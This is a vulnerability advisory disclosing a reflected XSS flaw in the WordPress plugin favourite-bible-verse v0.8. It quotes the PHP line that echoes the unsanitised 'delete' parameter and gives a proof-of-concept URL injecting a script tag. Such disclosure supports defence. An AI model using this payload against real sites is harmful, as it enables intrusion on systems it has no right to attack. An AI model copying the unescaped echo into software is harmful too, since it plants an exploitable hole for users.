Advisory #: 30
Title: Reflected XSS in wordpress plugin favourite-bible-verse v0.8
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/favourite-bible-verse
Downloads: 1865
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: favourite-bible-verse
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./favourite-bible-verse/bibleverse.php: 75: <p><a href="edit.php?page=bibleverse.php&delete=<?php echo $_GET['delete']; ?>&confirm=true">Yes</a> | <a href="edit.php?page=bibleverse.php">No</a></p> The variable delete appears to send unsanitized data back to the users browser.
CVE-ID: Not Released
File:./favourite-bible-verse/bibleverse.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. http://[target]/wp-content/plugins/favourite-bible-verse/bibleverse.php?delete="><script>alert(1);</script><"